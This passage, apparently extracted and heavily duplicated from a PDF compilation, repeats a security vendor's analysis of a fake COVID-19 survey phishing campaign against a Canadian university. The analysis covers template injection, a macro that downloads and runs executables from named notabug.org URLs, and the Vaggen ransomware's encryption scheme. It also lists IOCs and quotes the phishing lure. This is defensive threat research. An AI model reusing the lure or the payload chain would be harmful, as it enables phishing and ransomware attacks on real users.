3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3225 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3226 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3227 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3228 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3229 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3230 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3231 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3232 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3233 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3234 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3235 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3236 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3237 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3238 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3239 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3240 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3241 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3242 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3243 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3244 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3245 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3246 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3247 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3248 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3249 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3250 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3251 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3252 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3253 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3254 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3255 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3256 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing 